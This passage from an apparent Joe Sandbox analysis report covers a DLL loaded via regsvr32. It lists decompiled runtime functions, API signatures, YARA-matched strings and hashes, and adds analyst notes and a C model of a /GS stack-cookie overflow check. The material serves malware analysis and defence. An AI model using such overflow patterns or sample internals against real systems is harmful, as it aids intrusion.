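    printf("guarded : 3 * 8 = %zu bytes, zero-filled: %d\n", guarded_block_size(3, 8), calloc_is_zeroed(3, 8));
    return 0;
}
```

The check divides rather than multiplies because the product itself is what may wrap; comparing HEAP_MAXREQ / count against size is exact for every count other than zero, which is why the decompile branches on rcx == 0 first.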

                                                                                                  Control-flow Graph

                                                                                                  C-Code - Quality: 71%
                                                                                                  			E00000001180001268(void* __ecx) {
                                                                                                  				void* __rbx;
                                                                                                  				void* _t12;
                                                                                                  				void* _t17;
                                                                                                  				void* _t18;
                                                                                                  				void* _t19;
                                                                                                  				void* _t20;
                                                                                                  				void* _t21;
                                                                                                  
                                                                                                  				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                  				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                  				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                                                  				if (E00000001180002A08() != 0) goto 0x80001297;
                                                                                                  				goto 0x800012ab; // executed
                                                                                                  				E00000001180006CDC(_t17); // executed
                                                                                                  				if (0 != 0) goto 0x800012a9;
                                                                                                  				E00000001180002A58(0);
                                                                                                  				goto 0x80001293;
                                                                                                  				return 1;
                                                                                                  			}










                                                                                                  0x18000127c
                                                                                                  0x18000127f
                                                                                                  0x180001285
                                                                                                  0x180001291
                                                                                                  0x180001295
                                                                                                  0x180001297
                                                                                                  0x18000129e
                                                                                                  0x1800012a2
                                                                                                  0x1800012a7
                                                                                                  0x1800012b0

                                                                                                  APIs
                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                    • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                  • String ID:
                                                                                                  • API String ID: 108617051-0
                                                                                                  • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                  • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                  • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                  • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString$ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 80118013-0
                                                                                                  • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                  • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                  • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                  • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3252650109-0
                                                                                                  • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                  • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                  • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                  • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3140674995-0
                                                                                                  • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                  • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                  • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                  • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 65%
                                                                                                  			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                  				void* _t36;
                                                                                                  				int _t38;
                                                                                                  				signed long long _t60;
                                                                                                  				long long _t63;
                                                                                                  				_Unknown_base(*)()* _t82;
                                                                                                  				void* _t86;
                                                                                                  				void* _t87;
                                                                                                  				void* _t89;
                                                                                                  				signed long long _t90;
                                                                                                  				struct _EXCEPTION_POINTERS* _t95;
                                                                                                  
                                                                                                  				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                  				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                  				_t87 = _t89 - 0x4f0;
                                                                                                  				_t90 = _t89 - 0x5f0;
                                                                                                  				_t60 =  *0x80021010; // 0x5388a1408558 = __security_cookie, the /GS cookie stored at 0x180021010
                                                                                                  				 *(_t87 + 0x4e0) = _t60 ^ _t90; // cookie ^ rsp saved in this frame's canary slot
                                                                                                  				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                                  				E00000001180001C40(_t36);
                                                                                                  				r8d = 0x98;
                                                                                                  				E00000001180002680();
                                                                                                  				r8d = 0x4d0;
                                                                                                  				E00000001180002680();
                                                                                                  				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                  				_t63 = _t87 + 0x10;
                                                                                                  				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                  				__imp__RtlCaptureContext();
                                                                                                  				r8d = 0;
                                                                                                  				__imp__RtlLookupFunctionEntry();
                                                                                                  				if (_t63 == 0) goto 0x800083be;
                                                                                                  				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                  				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                  				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                  				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                  				__imp__RtlVirtualUnwind();
                                                                                                  				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                  				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                  				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                  				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                  				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                  				_t38 = IsDebuggerPresent();
                                                                                                  				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                  				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                                  				if (_t38 != 0) goto 0x80008420;
                                                                                                  				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                                  				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                  			}

                                                                                                  Basic block addresses: 0x1800082ec, 0x1800082f1, 0x1800082fa, 0x180008302, 0x180008309, 0x180008313, 0x180008324, 0x180008326, 0x180008332, 0x180008338, 0x180008343, 0x180008349, 0x180008353, 0x18000835c, 0x180008360, 0x180008365, 0x18000837a, 0x18000837d, 0x180008386, 0x180008388, 0x18000839b, 0x1800083a8, 0x1800083b1, 0x1800083b8, 0x1800083c5, 0x1800083d7, 0x1800083db, 0x1800083e9, 0x1800083ed, 0x1800083f1, 0x1800083fb, 0x18000840e, 0x180008412, 0x180008417, 0x180008446

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1239891234-0
                                                                                                  • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                  • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                  • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                  • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
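Analyst note on the function above (0x1800082ec to 0x180008446): the call sequence RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, together with the two zeroing calls sized 0x4d0 (the x64 CONTEXT structure) and 0x98 (EXCEPTION_RECORD), is the statically linked MSVC runtime's fast-fail / stack-cookie failure reporting path, and the global-cookie XOR with the frame address stored on entry and re-checked on return is the compiler's own /GS prologue and epilogue for this function. This is CRT code rather than sample-authored anti-debugging, so a generic "IsDebuggerPresent" signature hit should be traced to its call site before being counted as an evasion capability. The program below is an added example, not code from the sample or from Joe Sandbox: it models the /GS cookie scheme with an explicit frame struct so the buffer overrun stays within defined behaviour, and replaces the runtime's reporting path with a stand-in that only records the failure code. All names (gs_frame, gs_enter, gs_check_cookie, copy_with_gs, demo_overflow) and the fixed cookie value are this example's own assumptions.

```c
/* Added example (not from the analysed sample or Joe Sandbox).
 * Models the MSVC /GS stack-cookie scheme seen in the decompiled function:
 * on entry the global cookie is XORed with the frame address and stored in
 * the frame; on exit the stored value is XORed back and compared with the
 * global. A mismatch routes to the runtime's failure-reporting path.
 * The frame is an explicit struct so the overrun is defined C, not real
 * stack corruption. Names here are this example's own. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STATUS_STACK_BUFFER_OVERRUN 0xC0000409u  /* code raised on cookie failure */

/* Stand-in for __security_cookie; the x64 default value, fixed here so the
 * example is reproducible (a real process re-seeds it at startup). */
static const uintptr_t g_security_cookie = 0x2B992DDFA232ULL;

/* Simulated x64 frame: the buffer sits below the cookie, and the cookie
 * shields the saved return address from a forward overrun. */
struct gs_frame {
    char      buf[16];
    uintptr_t cookie;       /* holds cookie ^ &frame, as in the prologue */
    uintptr_t return_addr;
};

static unsigned g_last_fastfail = 0;
static int      g_fastfail_calls = 0;

/* Stand-in for __security_check_cookie's failure path. The real runtime
 * captures a CONTEXT, unwinds one frame, calls IsDebuggerPresent,
 * SetUnhandledExceptionFilter(NULL) and UnhandledExceptionFilter, then
 * terminates the process; this example only records what happened. */
static void gs_report_failure(unsigned code) {
    g_last_fastfail = code;
    g_fastfail_calls++;
}

/* Prologue equivalent: store cookie XOR frame address. */
static void gs_enter(struct gs_frame *f, uintptr_t ret) {
    f->return_addr = ret;
    f->cookie = g_security_cookie ^ (uintptr_t)f;
}

/* Epilogue equivalent: recover the cookie and compare. True if intact. */
static bool gs_check_cookie(const struct gs_frame *f) {
    if ((f->cookie ^ (uintptr_t)f) == g_security_cookie)
        return true;
    gs_report_failure(STATUS_STACK_BUFFER_OVERRUN);
    return false;
}

/* A function with an unchecked copy into its 16-byte buffer.
 * Returns true if the frame's cookie check passes afterwards. */
bool copy_with_gs(const void *src, size_t len) {
    struct gs_frame f;
    gs_enter(&f, 0x180001d98ULL);   /* arbitrary stand-in return address */
    /* Bounded by the whole frame rather than by buf: a defined overrun of
     * buf into the cookie slot (and, with enough bytes, the return address). */
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, src, len);
    return gs_check_cookie(&f);
}

/* Constructed input: len bytes of 'A', the classic overflow pattern.
 * True means the cookie survived the copy. */
bool demo_overflow(size_t len) {
    char payload[64];
    memset(payload, 'A', sizeof payload);
    if (len > sizeof payload) len = sizeof payload;
    return copy_with_gs(payload, len);
}

unsigned last_fastfail_code(void) { return g_last_fastfail; }
int      fastfail_count(void)     { return g_fastfail_calls; }

int main(void) {
    printf("16 bytes: %s\n", demo_overflow(16) ? "cookie intact" : "cookie smashed");
    printf("24 bytes: %s (code 0x%08X)\n",
           demo_overflow(24) ? "cookie intact" : "cookie smashed",
           last_fastfail_code());
    return 0;
}
```

The check happens only at function exit, which is why the runtime path in the decompiled code has to reconstruct the faulting context itself (RtlCaptureContext plus one RtlVirtualUnwind step) before handing it to UnhandledExceptionFilter: by then the corrupted frame has already been popped.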

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                  • API String ID: 0-182303197
                                                                                                  • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                  • Instruction ID: 9d0971f149300a2da1159f0feca88842b068e6ea0d0428c4b2198d388b2bb99c
                                                                                                  • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                  • Instruction Fuzzy Hash: AE122770A04709EFDB58DF68C08A99EBBF1FF48304F40816DE84AAB290D775DA59CB45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                  • API String ID: 0-557373213
                                                                                                  • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                  • Instruction ID: 5740a2682b6d2f9d2ab06866f6093be340be2060afb654ae031b95dd5cdc96fa
                                                                                                  • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                  • Instruction Fuzzy Hash: 75E1F27550160CCBDB68DF38C09A4D93BE1FF98308F611229FC6AA62A6DB74D954CB48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .I$gBfh$i[$w|${
                                                                                                  • API String ID: 0-448909954
                                                                                                  • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                  • Instruction ID: b413ddbe4629f4e3b19b58ec359cfc0ec743c4a5de5973c551d571d61cf2f970
                                                                                                  • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                  • Instruction Fuzzy Hash: A9B11670D247499FCB88DFA9D8898DDBBF0FB48304F40921DE856AB250C778A985CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cp$vm$x$zu$Kn#
                                                                                                  • API String ID: 0-3521309225
                                                                                                  • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                  • Instruction ID: 07970e9dc0c1bdee00f1dd6c159d6d88fe65fb2dbcf5e58c63fe41deeb5438d7
                                                                                                  • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                  • Instruction Fuzzy Hash: D6A104B1D143198FDB48CFA9D8898EEBBF0FB48318F109219E855B7290D3789945CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                  • API String ID: 0-817034907
                                                                                                  • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                  • Instruction ID: 3d5908fcfa391674b6ee9387de9aca38e7952ad2696c97e8c64d6398668a8648
                                                                                                  • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                  • Instruction Fuzzy Hash: 6341B2B180034E8FDB44CF64C88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,$3T$D-$Rc$l
                                                                                                  • API String ID: 0-617906138
                                                                                                  • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                  • Instruction ID: 995aa847677b75af1083da945dfce8ef485a9efaaa3099ca7840384544ce87ea
                                                                                                  • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                  • Instruction Fuzzy Hash: 5341D5B081078E8FDB44CF64D88A4CE7BF0FB58358F105619E869A6260D3B89664CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                                  
                                                                                                  				_a32 = __rbx;
                                                                                                  			}

                                                                                                  Basic block addresses: 0x180001d98

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                  • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                  • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                  • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$ $UCV$y4.)
                                                                                                  • API String ID: 0-917551206
                                                                                                  • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                  • Instruction ID: 44654c129d285dc29b311b99fff53068072f5a5d2949e5141c347b6be4fe34f1
                                                                                                  • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                  • Instruction Fuzzy Hash: 3C12F5B1A0470C9FDB58DFA8E48A8DDBBF2FB48348F40412DE906A7290D7B5D809CB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$rq%$tL>$".
• API String ID: 0-3922733902
• Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
• Instruction ID: 106f5664a8f1aa7ff5d9aba620061c10459693191bc8505ae34b750e2cb15c46
• Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
• Instruction Fuzzy Hash: 3222C2719097C88BDBF8DF24C8896DD37F0FF48344F50215A984EAA694DBB86685CF42
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: g$-$HE$Vc
• API String ID: 0-2562162751
• Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
• Instruction ID: 34afe11b47f37ab55318b857c78e5f87981c9c0ef31ba8f61ac0ae0e0d86fe94
• Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
• Instruction Fuzzy Hash: 06A1E2B150478C9FDB88CF28D88A4CD3BB2FB58358F505219FC4A97260D7B8D985CB85
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: (;$*i$he$*%
• API String ID: 0-35414758
• Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
• Instruction ID: ef950592c0a8c97ae84ea920fe8266ac05fede72a77f76e665cfdf552c6197a6
• Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
• Instruction Fuzzy Hash: 76711870514749DBDF48CF28C88A5DD3BA1FB4835CF566319FC8AA6290D778D884CB89
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: */$I$Yu$(
• API String ID: 0-674225443
• Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
• Instruction ID: 1b118042cc7599992217ba3788a35e778bf8c89850481b3d8d8f862aa713a4f3
• Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
• Instruction Fuzzy Hash: C2718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$.:$PYq|$W
• API String ID: 0-626586655
• Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
• Instruction ID: 623235f0e196be6d94089cddda6ed224ae06b15f539ff0e5a0ecae035ce6ab21
